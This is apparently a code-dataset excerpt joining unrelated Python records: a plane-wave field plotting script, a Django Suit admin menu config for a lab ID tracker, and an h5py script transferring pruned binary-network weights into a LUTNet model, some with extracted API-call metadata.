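    # Mirrors Conv2DMMLayer.get_output_shape_for, assuming NCHW layout.
    if border_mode == 'valid':
        pad = (0, 0)
    elif border_mode == 'full':
        pad = (filter_size[0] - 1, filter_size[1] - 1)
    elif border_mode == 'same':  # exact only for odd filter sizes
        pad = ((filter_size[0] - 1) // 2, (filter_size[1] - 1) // 2)
    else:
        raise ValueError("unsupported border_mode: %s" % border_mode)
    batch_size, _, in_w, in_h = input_shape
    out_w = (in_w + 2 * pad[0] - filter_size[0]) // strides[0] + 1
    out_h = (in_h + 2 * pad[1] - filter_size[1]) // strides[1] + 1
    return (batch_size, num_filters, out_w, out_h)

# A 3x3 'same' convolution keeps the spatial size; 'valid' shrinks it by 2.
print(conv2d_output_shape((32, 3, 28, 28), 16, (3, 3), border_mode='same'))   # (32, 16, 28, 28)
print(conv2d_output_shape((32, 3, 28, 28), 16, (3, 3), border_mode='valid'))  # (32, 16, 26, 26)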
import numpy as np
import matplotlib
import matplotlib.pyplot as plt

import sys
sys.path.append("../")
from quelea import *

nx = 217
ny = 133

x0 = 0
x1 = 30 # lambdas
y0 = 0
y1 = 20 # lambdas

xs = np.linspace(x0, x1, nx)
ys = np.linspace(y0, y1, ny)

# 2d array of (x, y, z, t)
coords = np.array( [ [x, y, 0, 0] for x in xs for y in ys ] )
# for map_fields function this should be converted from 2D to 1D array
coords = coords.reshape((4 * nx * ny,))

ftype = 1 # plane wave
a0 = 1 # normalized field amplitude
omega = 1 # frequency
fparam = [a0, 1, 0, 0, 0, 1, 0, 0, omega] # parameters of the plane wave

ex, ey, ez, bx, by, bz = map_fields(coords, ftype, fparam)

# now convert to 2d arrays
ex = ex.reshape((nx, ny))
ey = ey.reshape((nx, ny))
ez = ez.reshape((nx, ny))
bx = bx.reshape((nx, ny))
by = by.reshape((nx, ny))
bz = bz.reshape((nx, ny))

ex = ex.transpose()
ey = ey.transpose()
ez = ez.transpose()
bx = bx.transpose()
by = by.transpose()
bz = bz.transpose()

plt.imshow(ey, cmap = 'RdYlBu', origin = 'lower', extent = [x0, x1, y0, y1])
plt.colorbar()
plt.clim(-a0, a0)
plt.savefig("map_fields.pdf")
[ "matplotlib.pyplot.imshow", "matplotlib.pyplot.clim", "matplotlib.pyplot.savefig", "matplotlib.pyplot.colorbar", "numpy.array", "numpy.linspace", "sys.path.append" ]
[((81, 103), 'sys.path.append', 'sys.path.append', (['"""../"""'], {}), "('../')\n", (96, 103), False, 'import sys\n'), ((201, 224), 'numpy.linspace', 'np.linspace', (['x0', 'x1', 'nx'], {}), '(x0, x1, nx)\n', (212, 224), True, 'import numpy as np\n'), ((230, 253), 'numpy.linspace', 'np.linspace', (['y0', 'y1', 'ny'], {}), '(y0, y1, ny)\n', (241, 253), True, 'import numpy as np\n'), ((291, 339), 'numpy.array', 'np.array', (['[[x, y, 0, 0] for x in xs for y in ys]'], {}), '([[x, y, 0, 0] for x in xs for y in ys])\n', (299, 339), True, 'import numpy as np\n'), ((974, 1044), 'matplotlib.pyplot.imshow', 'plt.imshow', (['ey'], {'cmap': '"""RdYlBu"""', 'origin': '"""lower"""', 'extent': '[x0, x1, y0, y1]'}), "(ey, cmap='RdYlBu', origin='lower', extent=[x0, x1, y0, y1])\n", (984, 1044), True, 'import matplotlib.pyplot as plt\n'), ((1051, 1065), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (1063, 1065), True, 'import matplotlib.pyplot as plt\n'), ((1066, 1083), 'matplotlib.pyplot.clim', 'plt.clim', (['(-a0)', 'a0'], {}), '(-a0, a0)\n', (1074, 1083), True, 'import matplotlib.pyplot as plt\n'), ((1085, 1114), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""map_fields.pdf"""'], {}), "('map_fields.pdf')\n", (1096, 1114), True, 'import matplotlib.pyplot as plt\n')]
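The only non-obvious part of the plotting script above is the array plumbing around map_fields: coordinates are built as an (nx*ny, 4) table of (x, y, z, t) rows, flattened to length 4*nx*ny before the call, and each returned field component is reshaped back to (nx, ny) and transposed so that imshow receives a (ny, nx) image. The sketch below replays that layout with a stand-in field function, since quelea itself is assumed and not available here; fake_map_fields and its closed-form plane wave are ours.

import numpy as np

nx, ny = 5, 4
xs = np.linspace(0.0, 30.0, nx)
ys = np.linspace(0.0, 20.0, ny)

# One (x, y, z, t) row per grid point, x varying slowest -- same ordering as above.
coords = np.array([[x, y, 0.0, 0.0] for x in xs for y in ys])   # shape (nx*ny, 4)
flat = coords.reshape((4 * nx * ny,))                          # flattened, as map_fields expects

def fake_map_fields(flat_coords):
    # Stand-in for quelea.map_fields: ey = cos(x) plane wave, all other components zero.
    c = flat_coords.reshape((-1, 4))
    ey = np.cos(c[:, 0])
    zeros = np.zeros_like(ey)
    return zeros, ey, zeros, zeros, zeros, zeros

ex, ey, ez, bx, by, bz = fake_map_fields(flat)

# Back to the grid, then transpose so the vertical image axis is y.
ey = ey.reshape((nx, ny)).transpose()
print(ey.shape)   # (4, 5) == (ny, nx)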
from django.conf import settings
from suit import apps
from suit.apps import DjangoSuitConfig
from suit.menu import ParentItem, ChildItem

APP_NAME = settings.APP_NAME
WIKI_URL = settings.WIKI_URL


class SuitConfig(DjangoSuitConfig):
    name = 'suit'
    verbose_name = 'Mbiome Core JAXid Generator'
    site_title = 'Mbiome Core JAXid Tracking'
    site_header = site_title
    index_title = verbose_name

    layout = 'vertical'
    list_per_page = 35
    # header_date_format = 'l, d-M-o'
    # header_time_format = 'H:i e'

    menu = (
        ParentItem('JAX Id Record Lists',
                   use_first_child_url=True,
                   url='',
                   children=[
                       ChildItem('JAXid Records', model='id_generate.jaxiddetail'),
                       ChildItem(model='id_generate.boxid'),
                       ChildItem(model='id_generate.plateid'),
                   ],
                   icon='fa fa-list-ul'),
        ParentItem('Reference Data',
                   use_first_child_url=True,
                   url='',
                   children=[
                       ChildItem(model='id_generate.projectcode'),
                       ChildItem(model='id_generate.nucleicacidtype'),
                       ChildItem(model='id_generate.sampletype'),
                       ChildItem(model='id_generate.sequencingtype'),
                   ],
                   icon='fa fa-list'),
        ParentItem(
            label='Generate new JAXid''s',
            url=f'/{APP_NAME}/manage/id_generate/jaxiddetail/import/',
            permissions='id_generate.change_jaxiddetail',
            icon='fa fa-rocket'),
        ParentItem(
            label='Generate new Box ID''s',
            url=f'/{APP_NAME}/manage/id_generate/boxid/import/',
            permissions='id_generate.change_boxid',
            icon='fa fa-cube'),
        ParentItem(
            label='Generate new Plate ID''s',
            url=f'/{APP_NAME}/manage/id_generate/plateid/import/',
            permissions='id_generate.change_plateid',
            icon='fa fa-circle-o-notch'),
        ParentItem(
            label='Authorization',
            children=[
                ChildItem('Staff', model='auth.user'),
                ChildItem(model='auth.group'),
                ChildItem(model='admin.logentry'),
            ],
            icon='fa fa-user-circle'),
        ParentItem(
            label='SOP and Request Sheet',
            use_first_child_url=False,
            url='',
            children=[
                ChildItem('View JAX ID Request SOP',
                          target_blank=True,
                          url=f'{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx'),
                ChildItem('View JAX ID Request Template Sheet',
                          url=f'{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx'),
            ],
            icon='fa fa-file'),
    )
    # menu_handler = None
    menu_show_home = False

    # Show changelist top actions only if any row is selected
    toggle_changelist_top_actions = False

    # # Enables two column layout for change forms with submit row on the right
    form_submit_on_right = False

    # Hide name/"original" column for all tabular inlines.
    # May be overridden in Inline class by suit_form_inlines_hide_original = False
    #form_inlines_hide_original = False

    form_size = {
        'default': apps.SUIT_FORM_SIZE_LARGE,
        'widgets': {
            'AutosizedTextarea': apps.SUIT_FORM_SIZE_X_LARGE,
            'Textarea': apps.SUIT_FORM_SIZE_X_LARGE,
        },
    }

    # form_size setting can be overridden in ModelAdmin using suit_form_size parameter
    #
    # Example:
    # ----------------------------------------------
    # suit_form_size = {
    #     'default': 'col-xs-12 col-sm-2', 'col-xs-12 col-sm-10',
    #     'fields': {
    #         'field_name': SUIT_FORM_SIZE_LARGE,
    #         'field_name2': SUIT_FORM_SIZE_X_LARGE,
    #     },
    #     'widgets': {
    #         'widget_class_name': SUIT_FORM_SIZE_FULL,
    #         'AdminTextareaWidget': SUIT_FORM_SIZE_FULL,
    #     },
    #     'fieldsets': {
    #         'fieldset_name': SUIT_FORM_SIZE_FULL,
    #         'fieldset_name2': SUIT_FORM_SIZE_FULL,
    #     }
    # }
[ "suit.menu.ChildItem", "suit.menu.ParentItem" ]
[((1411, 1586), 'suit.menu.ParentItem', 'ParentItem', ([], {'label': '"""Generate new JAXids"""', 'url': 'f"""/{APP_NAME}/manage/id_generate/jaxiddetail/import/"""', 'permissions': '"""id_generate.change_jaxiddetail"""', 'icon': '"""fa fa-rocket"""'}), "(label='Generate new JAXids', url=\n f'/{APP_NAME}/manage/id_generate/jaxiddetail/import/', permissions=\n 'id_generate.change_jaxiddetail', icon='fa fa-rocket')\n", (1421, 1586), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1657, 1819), 'suit.menu.ParentItem', 'ParentItem', ([], {'label': '"""Generate new Box IDs"""', 'url': 'f"""/{APP_NAME}/manage/id_generate/boxid/import/"""', 'permissions': '"""id_generate.change_boxid"""', 'icon': '"""fa fa-cube"""'}), "(label='Generate new Box IDs', url=\n f'/{APP_NAME}/manage/id_generate/boxid/import/', permissions=\n 'id_generate.change_boxid', icon='fa fa-cube')\n", (1667, 1819), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1890, 2068), 'suit.menu.ParentItem', 'ParentItem', ([], {'label': '"""Generate new Plate IDs"""', 'url': 'f"""/{APP_NAME}/manage/id_generate/plateid/import/"""', 'permissions': '"""id_generate.change_plateid"""', 'icon': '"""fa fa-circle-o-notch"""'}), "(label='Generate new Plate IDs', url=\n f'/{APP_NAME}/manage/id_generate/plateid/import/', permissions=\n 'id_generate.change_plateid', icon='fa fa-circle-o-notch')\n", (1900, 2068), False, 'from suit.menu import ParentItem, ChildItem\n'), ((703, 762), 'suit.menu.ChildItem', 'ChildItem', (['"""JAXid Records"""'], {'model': '"""id_generate.jaxiddetail"""'}), "('JAXid Records', model='id_generate.jaxiddetail')\n", (712, 762), False, 'from suit.menu import ParentItem, ChildItem\n'), ((784, 820), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.boxid"""'}), "(model='id_generate.boxid')\n", (793, 820), False, 'from suit.menu import ParentItem, ChildItem\n'), ((842, 880), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.plateid"""'}), "(model='id_generate.plateid')\n", (851, 880), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1098, 1140), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.projectcode"""'}), "(model='id_generate.projectcode')\n", (1107, 1140), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1162, 1208), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.nucleicacidtype"""'}), "(model='id_generate.nucleicacidtype')\n", (1171, 1208), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1230, 1271), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.sampletype"""'}), "(model='id_generate.sampletype')\n", (1239, 1271), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1293, 1338), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.sequencingtype"""'}), "(model='id_generate.sequencingtype')\n", (1302, 1338), False, 'from suit.menu import ParentItem, ChildItem\n'), ((2237, 2274), 'suit.menu.ChildItem', 'ChildItem', (['"""Staff"""'], {'model': '"""auth.user"""'}), "('Staff', model='auth.user')\n", (2246, 2274), False, 'from suit.menu import ParentItem, ChildItem\n'), ((2296, 2325), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""auth.group"""'}), "(model='auth.group')\n", (2305, 2325), False, 'from suit.menu import ParentItem, ChildItem\n'), ((2347, 2380), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""admin.logentry"""'}), "(model='admin.logentry')\n", (2356, 2380), False, 'from suit.menu import ParentItem, ChildItem\n'), ((2634, 2845), 
'suit.menu.ChildItem', 'ChildItem', (['"""View JAX ID Request SOP"""'], {'target_blank': '(True)', 'url': 'f"""{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx"""'}), "('View JAX ID Request SOP', target_blank=True, url=\n f'{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx'\n )\n", (2643, 2845), False, 'from suit.menu import ParentItem, ChildItem\n'), ((2917, 3142), 'suit.menu.ChildItem', 'ChildItem', (['"""View JAX ID Request Template Sheet"""'], {'url': 'f"""{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx"""'}), "('View JAX ID Request Template Sheet', url=\n f'{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx'\n )\n", (2926, 3142), False, 'from suit.menu import ParentItem, ChildItem\n')]
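For context on how a DjangoSuitConfig subclass like the one above is activated: in django-suit v2 the config class is referenced from INSTALLED_APPS rather than a bare 'suit' entry, and this particular config also expects APP_NAME and WIKI_URL to exist in settings. The fragment below is a hypothetical sketch only; the module path myproject.apps and the two setting values are assumptions, not taken from the original project.

# settings.py (fragment) -- hypothetical project wiring
APP_NAME = 'jaxid'                        # consumed by SuitConfig for the .../import/ menu URLs
WIKI_URL = 'https://example.org/wiki'     # base URL for the SOP and template-sheet links

INSTALLED_APPS = [
    'myproject.apps.SuitConfig',   # the DjangoSuitConfig subclass shown above
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'id_generate',                 # app providing the jaxiddetail/boxid/plateid models
]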
import h5py import numpy as np np.set_printoptions(threshold=np.nan) from shutil import copyfile copyfile("dummy_lutnet.h5", "pretrained_bin.h5") # create pretrained.h5 using datastructure from dummy.h5 bl = h5py.File("baseline_pruned.h5", 'r') #dummy = h5py.File("dummy.h5", 'r') pretrained = h5py.File("pretrained_bin.h5", 'r+') # dense layer 1 bl_w1 = bl["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable_1:0"] bl_pruning_mask = bl["model_weights"]["binary_dense_1"]["binary_dense_1"]["pruning_mask:0"] bl_gamma = bl["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable:0"] zero_fill = np.zeros(np.shape(np.array(bl_w1))) pret_w1 = pretrained["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable_1:0"] pret_pruning_mask = pretrained["model_weights"]["binary_dense_1"]["binary_dense_1"]["pruning_mask:0"] p_gamma = pretrained["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable:0"] pret_w1[...] = np.array(bl_w1) p_gamma[...] = np.array(bl_gamma) pret_pruning_mask[...] = np.array(bl_pruning_mask) print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask)))) # dense layer 2 bl_w1 = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_1:0"] bl_rand_map_0 = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_0:0"] bl_pruning_mask = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["pruning_mask:0"] bl_gamma = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable:0"] bl_means = bl["model_weights"]["residual_sign_1"]["residual_sign_1"]["means:0"] pret_rand_map_0 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_0:0"] pret_rand_map_1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_1:0"] pret_rand_map_2 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_2:0"] pret_pruning_mask = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["pruning_mask:0"] p_gamma = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable:0"] pret_means = pretrained["model_weights"]["residual_sign_1"]["residual_sign_1"]["means:0"] pret_c1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_1:0"] pret_c2 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_2:0"] pret_c3 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_3:0"] pret_c4 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_4:0"] pret_c5 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_5:0"] pret_c6 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_6:0"] pret_c7 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_7:0"] pret_c8 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_8:0"] pret_c9 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_9:0"] pret_c10= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_10:0"] pret_c11= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_11:0"] pret_c12= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_12:0"] pret_c13= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_13:0"] pret_c14= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_14:0"] pret_c15= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_15:0"] pret_c16= 
pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_16:0"] pret_c17= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_17:0"] pret_c18= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_18:0"] pret_c19= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_19:0"] pret_c20= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_20:0"] pret_c21= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_21:0"] pret_c22= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_22:0"] pret_c23= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_23:0"] pret_c24= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_24:0"] pret_c25= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_25:0"] pret_c26= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_26:0"] pret_c27= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_27:0"] pret_c28= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_28:0"] pret_c29= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_29:0"] pret_c30= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_30:0"] pret_c31= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_31:0"] pret_c32= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_32:0"] pret_w1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_33:0"] pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_exp_0:0"] pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_exp_1:0"] pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_exp_2:0"] weight_shape = np.shape(bl_w1) tile_shape = np.shape(pret_c1) zero_fill = np.zeros(tile_shape) one_fill = np.ones(tile_shape) neg_one_fill = -np.ones(tile_shape) # randomisation and pruning recovery bl_w1_unroll = np.array(bl_w1) bl_w1 = np.array(bl_w1) rand_map_0 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_0) rand_map_1 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_1) rand_map_2 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_2) pruning_mask = np.array(bl_pruning_mask).astype(bool) init_mask = np.logical_not(pruning_mask[rand_map_0]) pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)] pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover) init_mask = np.reshape(init_mask, tile_shape) # expand randomisation map across tiles rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]]) rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]]) rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]]) for i in range(weight_shape[0]): rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) 
bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand] bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape) w1 = bl_w1 # connect1 only c1 = one_fill c2 = neg_one_fill c3 = one_fill c4 = neg_one_fill c5 = one_fill c6 = neg_one_fill c7 = one_fill c8 = neg_one_fill c9 = one_fill c10 = neg_one_fill c11 = one_fill c12 = neg_one_fill c13 = one_fill c14 = neg_one_fill c15 = one_fill c16 = neg_one_fill c17 = neg_one_fill c18 = one_fill c19 = neg_one_fill c20 = one_fill c21 = neg_one_fill c22 = one_fill c23 = neg_one_fill c24 = one_fill c25 = neg_one_fill c26 = one_fill c27 = neg_one_fill c28 = one_fill c29 = neg_one_fill c30 = one_fill c31 = neg_one_fill c32 = one_fill pret_w1 [...] = w1 pret_c1 [...] = c1 pret_c2 [...] = c2 pret_c3 [...] = c3 pret_c4 [...] = c4 pret_c5 [...] = c5 pret_c6 [...] = c6 pret_c7 [...] = c7 pret_c8 [...] = c8 pret_c9 [...] = c9 pret_c10[...] = c10 pret_c11[...] = c11 pret_c12[...] = c12 pret_c13[...] = c13 pret_c14[...] = c14 pret_c15[...] = c15 pret_c16[...] = c16 pret_c17[...] = c17 pret_c18[...] = c18 pret_c19[...] = c19 pret_c20[...] = c20 pret_c21[...] = c21 pret_c22[...] = c22 pret_c23[...] = c23 pret_c24[...] = c24 pret_c25[...] = c25 pret_c26[...] = c26 pret_c27[...] = c27 pret_c28[...] = c28 pret_c29[...] = c29 pret_c30[...] = c30 pret_c31[...] = c31 pret_c32[...] = c32 pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float) pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float) pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float) p_gamma[...] = np.array(bl_gamma) pret_means[...] = np.array(bl_means) pret_pruning_mask[...] = np.array(bl_pruning_mask) rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float) pret_rand_map_exp_0[...] = rand_map_0_expand rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float) pret_rand_map_exp_1[...] = rand_map_1_expand rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float) pret_rand_map_exp_2[...] 
= rand_map_2_expand print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask)))) # dense layer 3 bl_w1 = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_1:0"] bl_rand_map_0 = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_0:0"] bl_pruning_mask = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["pruning_mask:0"] bl_gamma = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable:0"] bl_means = bl["model_weights"]["residual_sign_2"]["residual_sign_2"]["means:0"] pret_rand_map_0 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_0:0"] pret_rand_map_1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_1:0"] pret_rand_map_2 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_2:0"] pret_pruning_mask = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["pruning_mask:0"] p_gamma = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable:0"] pret_means = pretrained["model_weights"]["residual_sign_2"]["residual_sign_2"]["means:0"] pret_c1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_1:0"] pret_c2 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_2:0"] pret_c3 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_3:0"] pret_c4 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_4:0"] pret_c5 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_5:0"] pret_c6 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_6:0"] pret_c7 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_7:0"] pret_c8 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_8:0"] pret_c9 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_9:0"] pret_c10= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_10:0"] pret_c11= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_11:0"] pret_c12= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_12:0"] pret_c13= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_13:0"] pret_c14= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_14:0"] pret_c15= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_15:0"] pret_c16= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_16:0"] pret_c17= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_17:0"] pret_c18= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_18:0"] pret_c19= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_19:0"] pret_c20= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_20:0"] pret_c21= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_21:0"] pret_c22= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_22:0"] pret_c23= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_23:0"] pret_c24= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_24:0"] pret_c25= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_25:0"] pret_c26= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_26:0"] pret_c27= 
pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_27:0"] pret_c28= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_28:0"] pret_c29= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_29:0"] pret_c30= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_30:0"] pret_c31= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_31:0"] pret_c32= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_32:0"] pret_w1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_33:0"] pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_exp_0:0"] pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_exp_1:0"] pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_exp_2:0"] weight_shape = np.shape(bl_w1) tile_shape = np.shape(pret_c1) zero_fill = np.zeros(tile_shape) one_fill = np.ones(tile_shape) neg_one_fill = -np.ones(tile_shape) # randomisation and pruning recovery bl_w1_unroll = np.array(bl_w1) bl_w1 = np.array(bl_w1) rand_map_0 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_0) rand_map_1 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_1) rand_map_2 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_2) pruning_mask = np.array(bl_pruning_mask).astype(bool) init_mask = np.logical_not(pruning_mask[rand_map_0]) pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)] pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover) init_mask = np.reshape(init_mask, tile_shape) # expand randomisation map across tiles rand_map_0_expand = 